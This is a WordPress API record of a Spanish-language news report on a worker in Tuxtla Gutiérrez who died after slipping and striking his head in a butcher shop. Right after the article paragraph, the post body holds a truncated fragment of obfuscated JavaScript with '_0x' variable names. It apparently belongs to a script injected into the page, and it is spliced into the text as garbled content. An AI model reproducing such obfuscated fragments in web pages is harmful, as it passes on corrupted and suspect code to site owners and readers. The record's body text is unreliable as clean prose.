{"id":8833,"date":"2023-02-27T01:06:51","date_gmt":"2023-02-27T01:06:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8833"},"modified":"2023-02-27T01:06:52","modified_gmt":"2023-02-27T01:06:52","slug":"muere-hombre-al-caer-y-golpearse-la-cabeza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8833","title":{"rendered":"Muere hombre al caer y golpearse la cabeza"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677459883988.jpg\" alt=\"\" class=\"wp-image-8834\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677459883988.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677459883988-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 26 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida este domingo luego de que se cayera de su propia altura y se golpeara la cabeza al Interior de una carnicer\u00eda de la Colonia Ju\u00e1rez de Tuxtla Guti\u00e9rrez.Este hecho ocurri\u00f3 cuando, el hombre identificado como Julio Issac de 35 a\u00f1os realizaba sus labores cuando resbal\u00f3 y se golpe\u00f3 parte de la cabeza y el cuello lo que presuntamente caus\u00f3 una fractura en la cervical.Los compa\u00f1eros del obrero lo llevaron a un hospital particular localizado en la 14 Poniente y 2a Sur.Lamentablemente los m\u00e9dicos ya nada pudieron hacer pues habia perdido la vida.Al lugar arribaron peritos de la FGE para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 26 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un hombre perdi\u00f3 la vida este domingo luego de que se cayera de su propia altura y se golpeara la cabeza al Interior de una carnicer\u00eda de la Colonia Ju\u00e1rez de Tuxtla Guti\u00e9rrez.Este hecho ocurri\u00f3 cuando, el hombre identificado como Julio Issac de 35 a\u00f1os &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8834,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8833","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8833","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8833"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8833\/revisions"}],"predecessor-version":[{"id":8835,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8833\/revisions\/8835"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8834"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}